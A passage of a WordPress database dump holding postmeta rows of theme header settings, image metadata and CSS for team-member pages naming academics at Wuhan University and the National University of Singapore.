(13778,2818,'_dt_fancy_header_subtitle_line_height','26'),
(13779,2818,'_dt_fancy_header_subtitle_text_transform','none'),
(13780,2818,'_dt_fancy_header_subtitle_color_mode','color'),
(13781,2818,'_dt_fancy_header_subtitle_color','#ffffff'),
(13782,2818,'_dt_fancy_header_bg_heading',''),
(13783,2818,'_dt_fancy_header_bg_color','#222222'),
(13784,2818,'_dt_fancy_header_bg_image_origin','custom'),
(13785,2818,'_dt_fancy_header_bg_image','a:0:{}'),
(13786,2818,'_dt_fancy_header_bg_repeat','no-repeat'),
(13787,2818,'_dt_fancy_header_bg_position_x','center'),
(13788,2818,'_dt_fancy_header_bg_position_y','center'),
(13789,2818,'_dt_fancy_header_bg_fullscreen','1'),
(13790,2818,'_dt_fancy_header_bg_overlay','0'),
(13791,2818,'_dt_fancy_header_overlay_color','#000'),
(13792,2818,'_dt_fancy_header_bg_overlay_opacity','50'),
(13793,2818,'_dt_fancy_header_scroll_effect','default'),
(13794,2818,'_dt_fancy_header_bg_parallax','0.5'),
(13795,2818,'_dt_fancy_header_responsiveness_heading',''),
(13796,2818,'_dt_fancy_header_responsiveness','enabled'),
(13797,2818,'_dt_fancy_header_responsiveness_switch','778px'),
(13798,2818,'_dt_fancy_header_responsive_height','70'),
(13799,2818,'_dt_fancy_header_responsive_font_size','30'),
(13800,2818,'_dt_fancy_header_responsive_title_line_height','38'),
(13801,2818,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13802,2818,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13803,2818,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13804,2818,'_dt_teammate_options_go_to_single','1'),
(13805,2818,'_dt_teammate_options_position',''),
(13806,2818,'_dt_teammate_options_website',''),
(13807,2818,'_dt_teammate_options_mail',''),
(13808,2818,'_dt_teammate_options_facebook',''),
(13809,2818,'_dt_teammate_options_twitter',''),
(13810,2818,'_dt_teammate_options_dribbble',''),
(13811,2818,'_dt_teammate_options_you-tube',''),
(13812,2818,'_dt_teammate_options_rss',''),
(13813,2818,'_dt_teammate_options_delicious',''),
(13814,2818,'_dt_teammate_options_flickr',''),
(13815,2818,'_dt_teammate_options_lastfm',''),
(13816,2818,'_dt_teammate_options_linkedin',''),
(13817,2818,'_dt_teammate_options_vimeo',''),
(13818,2818,'_dt_teammate_options_tumbler',''),
(13819,2818,'_dt_teammate_options_pinterest',''),
(13820,2818,'_dt_teammate_options_devian',''),
(13821,2818,'_dt_teammate_options_skype',''),
(13822,2818,'_dt_teammate_options_github',''),
(13823,2818,'_dt_teammate_options_instagram',''),
(13824,2818,'_dt_teammate_options_stumbleupon',''),
(13825,2818,'_dt_teammate_options_behance',''),
(13826,2818,'_dt_teammate_options_px-500',''),
(13827,2818,'_dt_teammate_options_tripedvisor',''),
(13828,2818,'_dt_teammate_options_vk',''),
(13829,2818,'_dt_teammate_options_foursquare',''),
(13830,2818,'_dt_teammate_options_xing',''),
(13831,2818,'_dt_teammate_options_weibo',''),
(13832,2818,'_dt_teammate_options_odnoklassniki',''),
(13833,2818,'_dt_teammate_options_research-gate',''),
(13834,2818,'_dt_teammate_options_yelp',''),
(13835,2818,'_dt_teammate_options_blogger',''),
(13836,2818,'_dt_teammate_options_soundcloud',''),
(13837,2818,'_dt_teammate_options_viber',''),
(13838,2818,'_dt_teammate_options_whatsapp',''),
(13839,2818,'_dt_teammate_options_reddit',''),
(13840,2818,'_dt_teammate_options_snapchat',''),
(13841,2818,'_dt_teammate_options_telegram',''),
(13842,2818,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13843,2820,'_edit_lock','1665767358:1'),
(13844,2821,'_wp_attached_file','2022/10/w132.jpg'),
(13845,2821,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:113;s:6:\"height\";i:130;s:4:\"file\";s:16:\"2022/10/w132.jpg\";s:8:\"filesize\";i:24718;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13846,2820,'_thumbnail_id','2821'),
(13847,2820,'_edit_last','1'),
(13848,2820,'_dt_sidebar_position','disabled'),
(13849,2820,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13850,2820,'_dt_sidebar_hide_on_mobile','0'),
(13851,2820,'_dt_footer_show','1'),
(13852,2820,'_dt_footer_widgetarea_id','sidebar_2'),
(13853,2820,'_dt_footer_hide_on_mobile','0'),
(13854,2820,'_dt_header_title','fancy'),
(13855,2820,'_dt_header_background','normal'),
(13856,2820,'_dt_header_background_below_slideshow','disabled'),
(13857,2820,'_dt_header_transparent_bg_color_scheme','light'),
(13858,2820,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13859,2820,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13860,2820,'_dt_header_transparent_bg_color','#000000'),
(13861,2820,'_dt_header_transparent_bg_opacity','50'),
(13862,2820,'_dt_header_disabled_background','normal'),
(13863,2820,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13864,2820,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13865,2820,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13866,2820,'_dt_header_disabled_transparent_bg_color','#000000'),
(13867,2820,'_dt_header_disabled_transparent_bg_opacity','50'),
(13868,2820,'_dt_page_overrides_top_margin',''),
(13869,2820,'_dt_page_overrides_right_margin',''),
(13870,2820,'_dt_page_overrides_bottom_margin',''),
(13871,2820,'_dt_page_overrides_left_margin',''),
(13872,2820,'_dt_mobile_page_padding_top',''),
(13873,2820,'_dt_mobile_page_padding_right',''),
(13874,2820,'_dt_mobile_page_padding_bottom',''),
(13875,2820,'_dt_mobile_page_padding_left',''),
(13876,2820,'_dt_fancy_header_layout_heading',''),
(13877,2820,'_dt_fancy_header_title_aligment','center'),
(13878,2820,'_dt_fancy_header_height','300'),
(13879,2820,'_dt_fancy_header_padding-top','0px'),
(13880,2820,'_dt_fancy_header_padding-bottom','0px'),
(13881,2820,'_dt_fancy_header_breadcrumbs_heading',''),
(13882,2820,'_dt_fancy_header_breadcrumbs','disabled'),
(13883,2820,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13884,2820,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13885,2820,'_dt_fancy_header_title_heading',''),
(13886,2820,'_dt_fancy_header_title_mode','custom'),
(13887,2820,'_dt_fancy_header_title','Prof. Bi Yu Chen Wuhan University, China (WG IV/3)'),
(13888,2820,'_dt_fancy_header_title_font_size','30'),
(13889,2820,'_dt_fancy_header_title_line_height','36'),
(13890,2820,'_dt_fancy_header_text_transform','none'),
(13891,2820,'_dt_fancy_header_title_color_mode','color'),
(13892,2820,'_dt_fancy_header_title_color','#ffffff'),
(13893,2820,'_dt_fancy_header_subtitle_heading',''),
(13894,2820,'_dt_fancy_header_subtitle',''),
(13895,2820,'_dt_fancy_header_subtitle_font_size','18'),
(13896,2820,'_dt_fancy_header_subtitle_line_height','26'),
(13897,2820,'_dt_fancy_header_subtitle_text_transform','none'),
(13898,2820,'_dt_fancy_header_subtitle_color_mode','color'),
(13899,2820,'_dt_fancy_header_subtitle_color','#ffffff'),
(13900,2820,'_dt_fancy_header_bg_heading',''),
(13901,2820,'_dt_fancy_header_bg_color','#222222'),
(13902,2820,'_dt_fancy_header_bg_image_origin','custom'),
(13903,2820,'_dt_fancy_header_bg_image','a:0:{}'),
(13904,2820,'_dt_fancy_header_bg_repeat','no-repeat'),
(13905,2820,'_dt_fancy_header_bg_position_x','center'),
(13906,2820,'_dt_fancy_header_bg_position_y','center'),
(13907,2820,'_dt_fancy_header_bg_fullscreen','1'),
(13908,2820,'_dt_fancy_header_bg_overlay','0'),
(13909,2820,'_dt_fancy_header_overlay_color','#000'),
(13910,2820,'_dt_fancy_header_bg_overlay_opacity','50'),
(13911,2820,'_dt_fancy_header_scroll_effect','default'),
(13912,2820,'_dt_fancy_header_bg_parallax','0.5'),
(13913,2820,'_dt_fancy_header_responsiveness_heading',''),
(13914,2820,'_dt_fancy_header_responsiveness','enabled'),
(13915,2820,'_dt_fancy_header_responsiveness_switch','778px'),
(13916,2820,'_dt_fancy_header_responsive_height','70'),
(13917,2820,'_dt_fancy_header_responsive_font_size','30'),
(13918,2820,'_dt_fancy_header_responsive_title_line_height','38'),
(13919,2820,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13920,2820,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13921,2820,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13922,2820,'_dt_teammate_options_go_to_single','1'),
(13923,2820,'_dt_teammate_options_position',''),
(13924,2820,'_dt_teammate_options_website',''),
(13925,2820,'_dt_teammate_options_mail',''),
(13926,2820,'_dt_teammate_options_facebook',''),
(13927,2820,'_dt_teammate_options_twitter',''),
(13928,2820,'_dt_teammate_options_dribbble',''),
(13929,2820,'_dt_teammate_options_you-tube',''),
(13930,2820,'_dt_teammate_options_rss',''),
(13931,2820,'_dt_teammate_options_delicious',''),
(13932,2820,'_dt_teammate_options_flickr',''),
(13933,2820,'_dt_teammate_options_lastfm',''),
(13934,2820,'_dt_teammate_options_linkedin',''),
(13935,2820,'_dt_teammate_options_vimeo',''),
(13936,2820,'_dt_teammate_options_tumbler',''),
(13937,2820,'_dt_teammate_options_pinterest',''),
(13938,2820,'_dt_teammate_options_devian',''),
(13939,2820,'_dt_teammate_options_skype',''),
(13940,2820,'_dt_teammate_options_github',''),
(13941,2820,'_dt_teammate_options_instagram',''),
(13942,2820,'_dt_teammate_options_stumbleupon',''),
(13943,2820,'_dt_teammate_options_behance',''),
(13944,2820,'_dt_teammate_options_px-500',''),
(13945,2820,'_dt_teammate_options_tripedvisor',''),
(13946,2820,'_dt_teammate_options_vk',''),
(13947,2820,'_dt_teammate_options_foursquare',''),
(13948,2820,'_dt_teammate_options_xing',''),
(13949,2820,'_dt_teammate_options_weibo',''),
(13950,2820,'_dt_teammate_options_odnoklassniki',''),
(13951,2820,'_dt_teammate_options_research-gate',''),
(13952,2820,'_dt_teammate_options_yelp',''),
(13953,2820,'_dt_teammate_options_blogger',''),
(13954,2820,'_dt_teammate_options_soundcloud',''),
(13955,2820,'_dt_teammate_options_viber',''),
(13956,2820,'_dt_teammate_options_whatsapp',''),
(13957,2820,'_dt_teammate_options_reddit',''),
(13958,2820,'_dt_teammate_options_snapchat',''),
(13959,2820,'_dt_teammate_options_telegram',''),
(13960,2820,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13961,2822,'_edit_lock','1665767362:1'),
(13962,2823,'_wp_attached_file','2022/10/w133.jpg'),
(13963,2823,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:110;s:6:\"height\";i:127;s:4:\"file\";s:16:\"2022/10/w133.jpg\";s:8:\"filesize\";i:20274;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13964,2822,'_thumbnail_id','2823'),
(13965,2822,'_edit_last','1'),
(13966,2822,'_dt_sidebar_position','disabled'),
(13967,2822,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13968,2822,'_dt_sidebar_hide_on_mobile','0'),
(13969,2822,'_dt_footer_show','1'),
(13970,2822,'_dt_footer_widgetarea_id','sidebar_2'),
(13971,2822,'_dt_footer_hide_on_mobile','0'),
(13972,2822,'_dt_header_title','fancy'),
(13973,2822,'_dt_header_background','normal'),
(13974,2822,'_dt_header_background_below_slideshow','disabled'),
(13975,2822,'_dt_header_transparent_bg_color_scheme','light'),
(13976,2822,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13977,2822,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13978,2822,'_dt_header_transparent_bg_color','#000000'),
(13979,2822,'_dt_header_transparent_bg_opacity','50'),
(13980,2822,'_dt_header_disabled_background','normal'),
(13981,2822,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13982,2822,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13983,2822,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13984,2822,'_dt_header_disabled_transparent_bg_color','#000000'),
(13985,2822,'_dt_header_disabled_transparent_bg_opacity','50'),
(13986,2822,'_dt_page_overrides_top_margin',''),
(13987,2822,'_dt_page_overrides_right_margin',''),
(13988,2822,'_dt_page_overrides_bottom_margin',''),
(13989,2822,'_dt_page_overrides_left_margin',''),
(13990,2822,'_dt_mobile_page_padding_top',''),
(13991,2822,'_dt_mobile_page_padding_right',''),
(13992,2822,'_dt_mobile_page_padding_bottom',''),
(13993,2822,'_dt_mobile_page_padding_left',''),
(13994,2822,'_dt_fancy_header_layout_heading',''),
(13995,2822,'_dt_fancy_header_title_aligment','center'),
(13996,2822,'_dt_fancy_header_height','300'),
(13997,2822,'_dt_fancy_header_padding-top','0px'),
(13998,2822,'_dt_fancy_header_padding-bottom','0px'),
(13999,2822,'_dt_fancy_header_breadcrumbs_heading',''),
(14000,2822,'_dt_fancy_header_breadcrumbs','enabled'),
(14001,2822,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14002,2822,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14003,2822,'_dt_fancy_header_title_heading',''),
(14004,2822,'_dt_fancy_header_title_mode','custom'),
(14005,2822,'_dt_fancy_header_title','Dr. Filip Biljecki National University of Singapore, Singapore (WG IV/1)'),
(14006,2822,'_dt_fancy_header_title_font_size','30'),
(14007,2822,'_dt_fancy_header_title_line_height','36'),
(14008,2822,'_dt_fancy_header_text_transform','none'),
(14009,2822,'_dt_fancy_header_title_color_mode','color'),
(14010,2822,'_dt_fancy_header_title_color','#ffffff'),
(14011,2822,'_dt_fancy_header_subtitle_heading',''),
(14012,2822,'_dt_fancy_header_subtitle',''),
(14013,2822,'_dt_fancy_header_subtitle_font_size','18'),
(14014,2822,'_dt_fancy_header_subtitle_line_height','26'),
(14015,2822,'_dt_fancy_header_subtitle_text_transform','none'),
(14016,2822,'_dt_fancy_header_subtitle_color_mode','color'),
(14017,2822,'_dt_fancy_header_subtitle_color','#ffffff'),
(14018,2822,'_dt_fancy_header_bg_heading',''),
(14019,2822,'_dt_fancy_header_bg_color','#222222'),
(14020,2822,'_dt_fancy_header_bg_image_origin','custom'),
(14021,2822,'_dt_fancy_header_bg_image','a:0:{}'),
(14022,2822,'_dt_fancy_header_bg_repeat','no-repeat'),
(14023,2822,'_dt_fancy_header_bg_position_x','center'),
(14024,2822,'_dt_fancy_header_bg_position_y','center'),
(14025,2822,'_dt_fancy_header_bg_fullscreen','1'),
(14026,2822,'_dt_fancy_header_bg_overlay','0'),
(14027,2822,'_dt_fancy_header_overlay_color','#000'),
(14028,2822,'_dt_fancy_header_bg_overlay_opacity','50'),
(14029,2822,'_dt_fancy_header_scroll_effect','default'),
(14030,2822,'_dt_fancy_header_bg_parallax','0.5'),
(14031,2822,'_dt_fancy_header_responsiveness_heading',''),
(14032,2822,'_dt_fancy_header_responsiveness','enabled'),
(14033,2822,'_dt_fancy_header_responsiveness_switch','778px'),
(14034,2822,'_dt_fancy_header_responsive_height','70'),
(14035,2822,'_dt_fancy_header_responsive_font_size','30'),
(14036,2822,'_dt_fancy_header_responsive_title_line_height','38'),
(14037,2822,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14038,2822,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14039,2822,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14040,2822,'_dt_teammate_options_go_to_single','1'),
(14041,2822,'_dt_teammate_options_position',''),
(14042,2822,'_dt_teammate_options_website',''),
(14043,2822,'_dt_teammate_options_mail',''),
(14044,2822,'_dt_teammate_options_facebook',''),
(14045,2822,'_dt_teammate_options_twitter',''),
(14046,2822,'_dt_teammate_options_dribbble',''),
(14047,2822,'_dt_teammate_options_you-tube',''),
(14048,2822,'_dt_teammate_options_rss',''),
(14049,2822,'_dt_teammate_options_delicious',''),
(14050,2822,'_dt_teammate_options_flickr',''),
(14051,2822,'_dt_teammate_options_lastfm',''),
(14052,2822,'_dt_teammate_options_linkedin',''),
(14053,2822,'_dt_teammate_options_vimeo',''),
(14054,2822,'_dt_teammate_options_tumbler',''),
(14055,2822,'_dt_teammate_options_pinterest',''),
(14056,2822,'_dt_teammate_options_devian',''),
(14057,2822,'_dt_teammate_options_skype',''),
(14058,2822,'_dt_teammate_options_github',''),
(14059,2822,'_dt_teammate_options_instagram',''),
(14060,2822,'_dt_teammate_options_stumbleupon',''),
(14061,2822,'_dt_teammate_options_behance',''),
(14062,2822,'_dt_teammate_options_px-500',''),
(14063,2822,'_dt_teammate_options_tripedvisor',''),
(14064,2822,'_dt_teammate_options_vk',''),
(14065,2822,'_dt_teammate_options_foursquare',''),
(14066,2822,'_dt_teammate_options_xing',''),
(14067,2822,'_dt_teammate_options_weibo',''),
(14068,2822,'_dt_teammate_options_odnoklassniki',''),
(14069,2822,'_dt_teammate_options_research-gate',''),
(14070,2822,'_dt_teammate_options_yelp',''),
(14071,2822,'_dt_teammate_options_blogger',''),
(14072,2822,'_dt_teammate_options_soundcloud',''),
(14073,2822,'_dt_teammate_options_viber',''),
(14074,2822,'_dt_teammate_options_whatsapp',''),
(14075,2822,'_dt_teammate_options_reddit',''),
(14076,2822,'_dt_teammate_options_snapchat',''),
(14077,2822,'_dt_teammate_options_telegram',''),
(14078,2822,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14079,2824,'_edit_lock','1665767365:1'),
(14080,2825,'_wp_attached_file','2022/10/w134.jpg'),
(14081,2825,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:117;s:6:\"height\";i:150;s:4:\"file\";s:16:\"2022/10/w134.jpg\";s:8:\"filesize\";i:23817;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14082,2824,'_thumbnail_id','2825'),
(14083,2824,'_edit_last','1'),
(14084,2824,'_dt_sidebar_position','disabled'),
(14085,2824,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14086,2824,'_dt_sidebar_hide_on_mobile','0'),
(14087,2824,'_dt_footer_show','1'),
(14088,2824,'_dt_footer_widgetarea_id','sidebar_2'),
(14089,2824,'_dt_footer_hide_on_mobile','0'),
(14090,2824,'_dt_header_title','fancy'),
(14091,2824,'_dt_header_background','normal'),
(14092,2824,'_dt_header_background_below_slideshow','disabled'),
(14093,2824,'_dt_header_transparent_bg_color_scheme','light'),
(14094,2824,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14095,2824,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14096,2824,'_dt_header_transparent_bg_color','#000000'),
(14097,2824,'_dt_header_transparent_bg_opacity','50'),
(14098,2824,'_dt_header_disabled_background','normal'),
(14099,2824,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14100,2824,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14101,2824,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14102,2824,'_dt_header_disabled_transparent_bg_color','#000000'),
(14103,2824,'_dt_header_disabled_transparent_bg_opacity','50'),
(14104,2824,'_dt_page_overrides_top_margin',''),
(14105,2824,'_dt_page_overrides_right_margin',''),
(14106,2824,'_dt_page_overrides_bottom_margin',''),
(14107,2824,'_dt_page_overrides_left_margin',''),
(14108,2824,'_dt_mobile_page_padding_top',''),
(14109,2824,'_dt_mobile_page_padding_right',''),
(14110,2824,'_dt_mobile_page_padding_bottom',''),
(14111,2824,'_dt_mobile_page_padding_left',''),
(14112,2824,'_dt_fancy_header_layout_heading',''),
(14113,2824,'_dt_fancy_header_title_aligment','center'),
(14114,2824,'_dt_fancy_header_height','300'),
(14115,2824,'_dt_fancy_header_padding-top','0px'),
(14116,2824,'_dt_fancy_header_padding-bottom','0px'),
(14117,2824,'_dt_fancy_header_breadcrumbs_heading',''),
(14118,2824,'_dt_fancy_header_breadcrumbs','disabled'),
(14119,2824,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14120,2824,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14121,2824,'_dt_fancy_header_title_heading',''),
(14122,2824,'_dt_fancy_header_title_mode','custom'),
(14123,2824,'_dt_fancy_header_title','Dr. Yingwei Yan National University of Singapore, Singapore (WG IV/6)'),
(14124,2824,'_dt_fancy_header_title_font_size','30'),
(14125,2824,'_dt_fancy_header_title_line_height','36'),
(14126,2824,'_dt_fancy_header_text_transform','none'),
(14127,2824,'_dt_fancy_header_title_color_mode','color'),
(14128,2824,'_dt_fancy_header_title_color','#ffffff'),
(14129,2824,'_dt_fancy_header_subtitle_heading',''),
(14130,2824,'_dt_fancy_header_subtitle',''),
(14131,2824,'_dt_fancy_header_subtitle_font_size','18'),
(14132,2824,'_dt_fancy_header_subtitle_line_height','26'),
(14133,2824,'_dt_fancy_header_subtitle_text_transform','none'),
(14134,2824,'_dt_fancy_header_subtitle_color_mode','color'),
(14135,2824,'_dt_fancy_header_subtitle_color','#ffffff'),
(14136,2824,'_dt_fancy_header_bg_heading',''),
(14137,2824,'_dt_fancy_header_bg_color','#222222'),
(14138,2824,'_dt_fancy_header_bg_image_origin','custom'),
(14139,2824,'_dt_fancy_header_bg_image','a:0:{}'),
(14140,2824,'_dt_fancy_header_bg_repeat','no-repeat'),
(14141,2824,'_dt_fancy_header_bg_position_x','center'),
(14142,2824,'_dt_fancy_header_bg_position_y','center'),
(14143,2824,'_dt_fancy_header_bg_fullscreen','1'),
(14144,2824,'_dt_fancy_header_bg_overlay','0'),
(14145,2824,'_dt_fancy_header_overlay_color','#000'),
(14146,2824,'_dt_fancy_header_bg_overlay_opacity','50'),
(14147,2824,'_dt_fancy_header_scroll_effect','default'),
(14148,2824,'_dt_fancy_header_bg_parallax','0.5'),
(14149,2824,'_dt_fancy_header_responsiveness_heading',''),
(14150,2824,'_dt_fancy_header_responsiveness','enabled'),
(14151,2824,'_dt_fancy_header_responsiveness_switch','778px'),
(14152,2824,'_dt_fancy_header_responsive_height','70'),
(14153,2824,'_dt_fancy_header_responsive_font_size','30'),
(14154,2824,'_dt_fancy_header_responsive_title_line_height','38'),
(14155,2824,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14156,2824,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14157,2824,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14158,2824,'_dt_teammate_options_go_to_single','1'),
(14159,2824,'_dt_teammate_options_position',''),
(14160,2824,'_dt_teammate_options_website',''),
(14161,2824,'_dt_teammate_options_mail',''),
(14162,2824,'_dt_teammate_options_facebook',''),
(14163,2824,'_dt_teammate_options_twitter',''),
(14164,2824,'_dt_teammate_options_dribbble',''),
(14165,2824,'_dt_teammate_options_you-tube',''),
